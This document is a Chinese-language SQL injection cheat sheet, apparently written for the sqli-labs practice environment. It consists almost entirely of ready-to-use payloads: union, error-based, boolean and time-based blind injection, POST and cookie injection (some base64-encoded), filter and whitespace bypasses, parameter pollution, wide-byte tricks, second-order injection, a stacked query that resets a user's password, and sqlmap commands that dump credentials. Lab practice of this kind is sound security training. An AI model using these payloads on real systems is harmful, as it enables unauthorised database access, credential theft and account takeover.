联合 ?id=1' order by 3 --+ 最后得出是3列 ?id=-1' union select1,2,3 --+ ?id=-1' union select1,2,database() --+ ?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ ?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema ='security' --+ ?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema ='security' andtable_name='users' --+ ?id=-1' union select1,2,group_concat(concat(username,0x7e,password)) from users --+ 报错盲注 ?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ ?id=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) --+ ?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),20,20) from information_schema.schemata),0x7e)) --+ 布尔盲注 ?id=1')) and length(database())=8--+ ?id=1')) and ascii(substr(database(),1,1))=115 --+ ?id=1')) and substr(database(),1,1)='s' --+ 延时 ?id=1' and sleep(5) --+ ?id=1' and if (length(database())=8,sleep(5),0) --+ 登录页面post型 uname=Dumb' and 1=1-- &passwd=Dumb uname=Dumb' and 1=2-- &passwd=Dumb uname=Dumb' order by 2-- &passwd=Dumb uname=-Dumb' union select 1,2-- &passwd=Dumb uname=-Dumb' union select 1,database()-- &passwd=Dumb 布尔+post uname=Dumb') -- &passwd=Dumb uname=Dumb') and updatexml(1,concat(0x7e,database()),1)--&passwd=Dumb 布尔 + post +延时 uname=Dumb'and length(database())=8-- &passwd=Dumb uname=Dumb") and if (length(database())=8,sleep(5),0)-- &passwd=Dumb 报错+post uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,database()),1)--+ 控制台 cookie document.cookie="uname=Dumb' and 1=1 --+" document.cookie="uname=Dumb' and 1=2 --+" document.cookie="uname=Dumb' order by 3--+" document.cookie="uname=-Dumb' unionselect 1,2,3 --+" document.cookie="uname=-Dumb' unionselect 1,2,database() --+" 控制台 cookie +base64编码 document.cookie="uname=Dumb') -- " document.cookie="uname=RHVtYicpIC0tIA==" document.cookie="uname= Dumb" order by 3-- " document.cookie="uname=RHVtYiIgb3JkZXIgYnkgMy0tIA==" document.cookie="uname=Dumb') and updatexml(1,concat(0x7e,database()),1)-- document.cookie="uname=RHVtYicpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKS0tIA==" -- 和#被过滤掉 ?id=-1' ' ?id=-1' union select 1,2,database() ' 二次注入 创建账号admin’# 和admin重名,因为#没有被注释,所以还是可以注册,但在修改密码的时候,admin’#的#被注释掉了,修改的其实是admin的密码 空格、and、or、注释过滤 ?id=a'union%a0select%a01,2,database()' %20 %09 %0a %0b %0c %0d %a0 /**/ ,都是空格的代替,最好用的还是%a0. 单引号加括号的联合查询,对注释和空格进行过滤 ?id=a')union%a0select(1),(database()),('3 只对union select进行了过滤,使用关键字不行,在url上对union和select之间加入%a0就行 ?id=a') union%a0select 1,2,database()--+ 参数污染 ?id=1 & id=-2' union select1,2,database()--+ ?id=1&id=-2" union select 1,2,database()--+ 宽字节 ?id=1%df' and 1=1 --+ ?id=1%df' and 1=2 --+ ?id=-1%df' union select 1,2,database() --+ ?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”--+ ?id=-1%df' union select 1,2,group_concat(table_name) frominformation_schema.tables where table_schema=0x7365637572697479 --+ 宽字节+报错 uname=Dumb�'and updatexml(1,concat(0x7e,database()),1) -- &passwd=Dumb uname=Dumb汉'and updatexml(1,concat(0x7e,database()),1) -- &passwd=Dumb 堆叠 ?id=-1'; update users set password='666' where username='Angelina' --+
sqlmap post注入 sqlmap -r 1.txt --dbs sqlmap -r 1.txt -D Staff--tables sqlmap -r 1.txt -D Staff -T Users --columns sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump